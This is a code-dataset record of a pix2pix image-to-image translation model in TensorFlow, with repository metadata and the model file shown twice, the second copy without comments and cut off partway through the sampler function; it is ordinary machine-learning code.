f705d6e28e10770948eaf92986fd5dda9272df1d
| 19,432
|
py
|
Python
|
model.py
|
UrusuLambda/pix2pix-tensorflow
|
9b1e832494f8b8b36ad2d0331cb5feda5bd65ce0
|
[
"MIT"
] | 1,014
|
2016-11-25T14:03:59.000Z
|
2022-03-26T14:57:07.000Z
|
model.py
|
Chediak/pix2pix-tensorflow
|
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
|
[
"MIT"
] | 35
|
2016-11-27T14:31:40.000Z
|
2020-10-19T15:37:14.000Z
|
model.py
|
Chediak/pix2pix-tensorflow
|
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
|
[
"MIT"
] | 349
|
2016-11-25T15:50:09.000Z
|
2022-02-28T21:16:21.000Z
|
from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
class pix2pix(object):
def __init__(self, sess, image_size=256,
batch_size=1, sample_size=1, output_size=256,
gf_dim=64, df_dim=64, L1_lambda=100,
input_c_dim=3, output_c_dim=3, dataset_name='facades',
checkpoint_dir=None, sample_dir=None):
"""
Args:
sess: TensorFlow session
batch_size: The size of batch. Should be specified before training.
output_size: (optional) The resolution in pixels of the images. [256]
gf_dim: (optional) Dimension of gen filters in first conv layer. [64]
df_dim: (optional) Dimension of discrim filters in first conv layer. [64]
input_c_dim: (optional) Dimension of input image color. For grayscale input, set to 1. [3]
output_c_dim: (optional) Dimension of output image color. For grayscale input, set to 1. [3]
"""
self.sess = sess
self.is_grayscale = (input_c_dim == 1)
self.batch_size = batch_size
self.image_size = image_size
self.sample_size = sample_size
self.output_size = output_size
self.gf_dim = gf_dim
self.df_dim = df_dim
self.input_c_dim = input_c_dim
self.output_c_dim = output_c_dim
self.L1_lambda = L1_lambda
# batch normalization : deals with poor initialization helps gradient flow
self.d_bn1 = batch_norm(name='d_bn1')
self.d_bn2 = batch_norm(name='d_bn2')
self.d_bn3 = batch_norm(name='d_bn3')
self.g_bn_e2 = batch_norm(name='g_bn_e2')
self.g_bn_e3 = batch_norm(name='g_bn_e3')
self.g_bn_e4 = batch_norm(name='g_bn_e4')
self.g_bn_e5 = batch_norm(name='g_bn_e5')
self.g_bn_e6 = batch_norm(name='g_bn_e6')
self.g_bn_e7 = batch_norm(name='g_bn_e7')
self.g_bn_e8 = batch_norm(name='g_bn_e8')
self.g_bn_d1 = batch_norm(name='g_bn_d1')
self.g_bn_d2 = batch_norm(name='g_bn_d2')
self.g_bn_d3 = batch_norm(name='g_bn_d3')
self.g_bn_d4 = batch_norm(name='g_bn_d4')
self.g_bn_d5 = batch_norm(name='g_bn_d5')
self.g_bn_d6 = batch_norm(name='g_bn_d6')
self.g_bn_d7 = batch_norm(name='g_bn_d7')
self.dataset_name = dataset_name
self.checkpoint_dir = checkpoint_dir
self.build_model()
def build_model(self):
self.real_data = tf.placeholder(tf.float32,
[self.batch_size, self.image_size, self.image_size,
self.input_c_dim + self.output_c_dim],
name='real_A_and_B_images')
self.real_B = self.real_data[:, :, :, :self.input_c_dim]
self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim]
self.fake_B = self.generator(self.real_A)
self.real_AB = tf.concat([self.real_A, self.real_B], 3)
self.fake_AB = tf.concat([self.real_A, self.fake_B], 3)
self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False)
self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True)
self.fake_B_sample = self.sampler(self.real_A)
self.d_sum = tf.summary.histogram("d", self.D)
self.d__sum = tf.summary.histogram("d_", self.D_)
self.fake_B_sum = tf.summary.image("fake_B", self.fake_B)
self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D)))
self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_)))
self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \
+ self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B))
self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real)
self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake)
self.d_loss = self.d_loss_real + self.d_loss_fake
self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss)
self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss)
t_vars = tf.trainable_variables()
self.d_vars = [var for var in t_vars if 'd_' in var.name]
self.g_vars = [var for var in t_vars if 'g_' in var.name]
self.saver = tf.train.Saver()
def load_random_samples(self):
data = np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size)
sample = [load_data(sample_file) for sample_file in data]
if (self.is_grayscale):
sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
else:
sample_images = np.array(sample).astype(np.float32)
return sample_images
def sample_model(self, sample_dir, epoch, idx):
sample_images = self.load_random_samples()
samples, d_loss, g_loss = self.sess.run(
[self.fake_B_sample, self.d_loss, self.g_loss],
feed_dict={self.real_data: sample_images}
)
save_images(samples, [self.batch_size, 1],
'./{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx))
print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss))
def train(self, args):
"""Train pix2pix"""
d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
.minimize(self.d_loss, var_list=self.d_vars)
g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
.minimize(self.g_loss, var_list=self.g_vars)
init_op = tf.global_variables_initializer()
self.sess.run(init_op)
self.g_sum = tf.summary.merge([self.d__sum,
self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum])
self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum])
self.writer = tf.summary.FileWriter("./logs", self.sess.graph)
counter = 1
start_time = time.time()
if self.load(self.checkpoint_dir):
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for epoch in xrange(args.epoch):
data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name))
#np.random.shuffle(data)
batch_idxs = min(len(data), args.train_size) // self.batch_size
for idx in xrange(0, batch_idxs):
batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size]
batch = [load_data(batch_file) for batch_file in batch_files]
if (self.is_grayscale):
batch_images = np.array(batch).astype(np.float32)[:, :, :, None]
else:
batch_images = np.array(batch).astype(np.float32)
# Update D network
_, summary_str = self.sess.run([d_optim, self.d_sum],
feed_dict={ self.real_data: batch_images })
self.writer.add_summary(summary_str, counter)
# Update G network
_, summary_str = self.sess.run([g_optim, self.g_sum],
feed_dict={ self.real_data: batch_images })
self.writer.add_summary(summary_str, counter)
# Run g_optim twice to make sure that d_loss does not go to zero (different from paper)
_, summary_str = self.sess.run([g_optim, self.g_sum],
feed_dict={ self.real_data: batch_images })
self.writer.add_summary(summary_str, counter)
errD_fake = self.d_loss_fake.eval({self.real_data: batch_images})
errD_real = self.d_loss_real.eval({self.real_data: batch_images})
errG = self.g_loss.eval({self.real_data: batch_images})
counter += 1
print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \
% (epoch, idx, batch_idxs,
time.time() - start_time, errD_fake+errD_real, errG))
if np.mod(counter, 100) == 1:
self.sample_model(args.sample_dir, epoch, idx)
if np.mod(counter, 500) == 2:
self.save(args.checkpoint_dir, counter)
def discriminator(self, image, y=None, reuse=False):
with tf.variable_scope("discriminator") as scope:
# image is 256 x 256 x (input_c_dim + output_c_dim)
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv')))
# h1 is (64 x 64 x self.df_dim*2)
h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv')))
# h2 is (32x 32 x self.df_dim*4)
h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv')))
# h3 is (16 x 16 x self.df_dim*8)
h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin')
return tf.nn.sigmoid(h4), h4
def generator(self, image, y=None):
with tf.variable_scope("generator") as scope:
s = self.output_size
s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)
# image is (256 x 256 x input_c_dim)
e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
# e1 is (128 x 128 x self.gf_dim)
e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
# e2 is (64 x 64 x self.gf_dim*2)
e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
# e3 is (32 x 32 x self.gf_dim*4)
e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
# e4 is (16 x 16 x self.gf_dim*8)
e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
# e5 is (8 x 8 x self.gf_dim*8)
e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
# e6 is (4 x 4 x self.gf_dim*8)
e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
# e7 is (2 x 2 x self.gf_dim*8)
e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))
# e8 is (1 x 1 x self.gf_dim*8)
self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
[self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
d1 = tf.concat([d1, e7], 3)
# d1 is (2 x 2 x self.gf_dim*8*2)
self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
[self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
d2 = tf.concat([d2, e6], 3)
# d2 is (4 x 4 x self.gf_dim*8*2)
self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
[self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
d3 = tf.concat([d3, e5], 3)
# d3 is (8 x 8 x self.gf_dim*8*2)
self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
[self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
d4 = self.g_bn_d4(self.d4)
d4 = tf.concat([d4, e4], 3)
# d4 is (16 x 16 x self.gf_dim*8*2)
self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
[self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
d5 = self.g_bn_d5(self.d5)
d5 = tf.concat([d5, e3], 3)
# d5 is (32 x 32 x self.gf_dim*4*2)
self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
[self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
d6 = self.g_bn_d6(self.d6)
d6 = tf.concat([d6, e2], 3)
# d6 is (64 x 64 x self.gf_dim*2*2)
self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
[self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
d7 = self.g_bn_d7(self.d7)
d7 = tf.concat([d7, e1], 3)
# d7 is (128 x 128 x self.gf_dim*1*2)
self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
[self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)
# d8 is (256 x 256 x output_c_dim)
return tf.nn.tanh(self.d8)
def sampler(self, image, y=None):
with tf.variable_scope("generator") as scope:
scope.reuse_variables()
s = self.output_size
s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)
# image is (256 x 256 x input_c_dim)
e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
# e1 is (128 x 128 x self.gf_dim)
e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
# e2 is (64 x 64 x self.gf_dim*2)
e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
# e3 is (32 x 32 x self.gf_dim*4)
e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
# e4 is (16 x 16 x self.gf_dim*8)
e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
# e5 is (8 x 8 x self.gf_dim*8)
e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
# e6 is (4 x 4 x self.gf_dim*8)
e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
# e7 is (2 x 2 x self.gf_dim*8)
e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))
# e8 is (1 x 1 x self.gf_dim*8)
self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
[self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
d1 = tf.concat([d1, e7], 3)
# d1 is (2 x 2 x self.gf_dim*8*2)
self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
[self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
d2 = tf.concat([d2, e6], 3)
# d2 is (4 x 4 x self.gf_dim*8*2)
self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
[self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
d3 = tf.concat([d3, e5], 3)
# d3 is (8 x 8 x self.gf_dim*8*2)
self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
[self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
d4 = self.g_bn_d4(self.d4)
d4 = tf.concat([d4, e4], 3)
# d4 is (16 x 16 x self.gf_dim*8*2)
self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
[self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
d5 = self.g_bn_d5(self.d5)
d5 = tf.concat([d5, e3], 3)
# d5 is (32 x 32 x self.gf_dim*4*2)
self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
[self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
d6 = self.g_bn_d6(self.d6)
d6 = tf.concat([d6, e2], 3)
# d6 is (64 x 64 x self.gf_dim*2*2)
self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
[self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
d7 = self.g_bn_d7(self.d7)
d7 = tf.concat([d7, e1], 3)
# d7 is (128 x 128 x self.gf_dim*1*2)
self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
[self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)
# d8 is (256 x 256 x output_c_dim)
return tf.nn.tanh(self.d8)
def save(self, checkpoint_dir, step):
model_name = "pix2pix.model"
model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoint...")
model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
def test(self, args):
"""Test pix2pix"""
init_op = tf.global_variables_initializer()
self.sess.run(init_op)
sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name))
# sort testing input
n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)]
sample_files = [x for (y, x) in sorted(zip(n, sample_files))]
# load testing input
print("Loading testing images ...")
sample = [load_data(sample_file, is_test=True) for sample_file in sample_files]
if (self.is_grayscale):
sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
else:
sample_images = np.array(sample).astype(np.float32)
sample_images = [sample_images[i:i+self.batch_size]
for i in xrange(0, len(sample_images), self.batch_size)]
sample_images = np.array(sample_images)
print(sample_images.shape)
start_time = time.time()
if self.load(self.checkpoint_dir):
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for i, sample_image in enumerate(sample_images):
idx = i+1
print("sampling image ", idx)
samples = self.sess.run(
self.fake_B_sample,
feed_dict={self.real_data: sample_image}
)
save_images(samples, [self.batch_size, 1],
'./{}/test_{:04d}.png'.format(args.test_dir, idx))
| 44.981481
| 136
| 0.572715
|
from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
class pix2pix(object):
def __init__(self, sess, image_size=256,
batch_size=1, sample_size=1, output_size=256,
gf_dim=64, df_dim=64, L1_lambda=100,
input_c_dim=3, output_c_dim=3, dataset_name='facades',
checkpoint_dir=None, sample_dir=None):
self.sess = sess
self.is_grayscale = (input_c_dim == 1)
self.batch_size = batch_size
self.image_size = image_size
self.sample_size = sample_size
self.output_size = output_size
self.gf_dim = gf_dim
self.df_dim = df_dim
self.input_c_dim = input_c_dim
self.output_c_dim = output_c_dim
self.L1_lambda = L1_lambda
self.d_bn1 = batch_norm(name='d_bn1')
self.d_bn2 = batch_norm(name='d_bn2')
self.d_bn3 = batch_norm(name='d_bn3')
self.g_bn_e2 = batch_norm(name='g_bn_e2')
self.g_bn_e3 = batch_norm(name='g_bn_e3')
self.g_bn_e4 = batch_norm(name='g_bn_e4')
self.g_bn_e5 = batch_norm(name='g_bn_e5')
self.g_bn_e6 = batch_norm(name='g_bn_e6')
self.g_bn_e7 = batch_norm(name='g_bn_e7')
self.g_bn_e8 = batch_norm(name='g_bn_e8')
self.g_bn_d1 = batch_norm(name='g_bn_d1')
self.g_bn_d2 = batch_norm(name='g_bn_d2')
self.g_bn_d3 = batch_norm(name='g_bn_d3')
self.g_bn_d4 = batch_norm(name='g_bn_d4')
self.g_bn_d5 = batch_norm(name='g_bn_d5')
self.g_bn_d6 = batch_norm(name='g_bn_d6')
self.g_bn_d7 = batch_norm(name='g_bn_d7')
self.dataset_name = dataset_name
self.checkpoint_dir = checkpoint_dir
self.build_model()
def build_model(self):
self.real_data = tf.placeholder(tf.float32,
[self.batch_size, self.image_size, self.image_size,
self.input_c_dim + self.output_c_dim],
name='real_A_and_B_images')
self.real_B = self.real_data[:, :, :, :self.input_c_dim]
self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim]
self.fake_B = self.generator(self.real_A)
self.real_AB = tf.concat([self.real_A, self.real_B], 3)
self.fake_AB = tf.concat([self.real_A, self.fake_B], 3)
self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False)
self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True)
self.fake_B_sample = self.sampler(self.real_A)
self.d_sum = tf.summary.histogram("d", self.D)
self.d__sum = tf.summary.histogram("d_", self.D_)
self.fake_B_sum = tf.summary.image("fake_B", self.fake_B)
self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D)))
self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_)))
self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \
+ self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B))
self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real)
self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake)
self.d_loss = self.d_loss_real + self.d_loss_fake
self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss)
self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss)
t_vars = tf.trainable_variables()
self.d_vars = [var for var in t_vars if 'd_' in var.name]
self.g_vars = [var for var in t_vars if 'g_' in var.name]
self.saver = tf.train.Saver()
def load_random_samples(self):
data = np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size)
sample = [load_data(sample_file) for sample_file in data]
if (self.is_grayscale):
sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
else:
sample_images = np.array(sample).astype(np.float32)
return sample_images
def sample_model(self, sample_dir, epoch, idx):
sample_images = self.load_random_samples()
samples, d_loss, g_loss = self.sess.run(
[self.fake_B_sample, self.d_loss, self.g_loss],
feed_dict={self.real_data: sample_images}
)
save_images(samples, [self.batch_size, 1],
'./{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx))
print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss))
def train(self, args):
d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
.minimize(self.d_loss, var_list=self.d_vars)
g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
.minimize(self.g_loss, var_list=self.g_vars)
init_op = tf.global_variables_initializer()
self.sess.run(init_op)
self.g_sum = tf.summary.merge([self.d__sum,
self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum])
self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum])
self.writer = tf.summary.FileWriter("./logs", self.sess.graph)
counter = 1
start_time = time.time()
if self.load(self.checkpoint_dir):
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for epoch in xrange(args.epoch):
data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name))
batch_idxs = min(len(data), args.train_size) // self.batch_size
for idx in xrange(0, batch_idxs):
batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size]
batch = [load_data(batch_file) for batch_file in batch_files]
if (self.is_grayscale):
batch_images = np.array(batch).astype(np.float32)[:, :, :, None]
else:
batch_images = np.array(batch).astype(np.float32)
_, summary_str = self.sess.run([d_optim, self.d_sum],
feed_dict={ self.real_data: batch_images })
self.writer.add_summary(summary_str, counter)
_, summary_str = self.sess.run([g_optim, self.g_sum],
feed_dict={ self.real_data: batch_images })
self.writer.add_summary(summary_str, counter)
_, summary_str = self.sess.run([g_optim, self.g_sum],
feed_dict={ self.real_data: batch_images })
self.writer.add_summary(summary_str, counter)
errD_fake = self.d_loss_fake.eval({self.real_data: batch_images})
errD_real = self.d_loss_real.eval({self.real_data: batch_images})
errG = self.g_loss.eval({self.real_data: batch_images})
counter += 1
print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \
% (epoch, idx, batch_idxs,
time.time() - start_time, errD_fake+errD_real, errG))
if np.mod(counter, 100) == 1:
self.sample_model(args.sample_dir, epoch, idx)
if np.mod(counter, 500) == 2:
self.save(args.checkpoint_dir, counter)
def discriminator(self, image, y=None, reuse=False):
with tf.variable_scope("discriminator") as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))
h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv')))
h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv')))
h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv')))
h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin')
return tf.nn.sigmoid(h4), h4
def generator(self, image, y=None):
with tf.variable_scope("generator") as scope:
s = self.output_size
s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)
e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))
self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
[self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
d1 = tf.concat([d1, e7], 3)
self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
[self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
d2 = tf.concat([d2, e6], 3)
self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
[self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
d3 = tf.concat([d3, e5], 3)
self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
[self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
d4 = self.g_bn_d4(self.d4)
d4 = tf.concat([d4, e4], 3)
self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
[self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
d5 = self.g_bn_d5(self.d5)
d5 = tf.concat([d5, e3], 3)
self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
[self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
d6 = self.g_bn_d6(self.d6)
d6 = tf.concat([d6, e2], 3)
self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6),
[self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True)
d7 = self.g_bn_d7(self.d7)
d7 = tf.concat([d7, e1], 3)
self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7),
[self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True)
return tf.nn.tanh(self.d8)
def sampler(self, image, y=None):
with tf.variable_scope("generator") as scope:
scope.reuse_variables()
s = self.output_size
s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)
e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv'))
self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8),
[self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True)
d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5)
d1 = tf.concat([d1, e7], 3)
self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1),
[self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True)
d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5)
d2 = tf.concat([d2, e6], 3)
self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2),
[self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True)
d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5)
d3 = tf.concat([d3, e5], 3)
self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3),
[self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True)
d4 = self.g_bn_d4(self.d4)
d4 = tf.concat([d4, e4], 3)
self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4),
[self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True)
d5 = self.g_bn_d5(self.d5)
d5 = tf.concat([d5, e3], 3)
self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5),
[self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True)
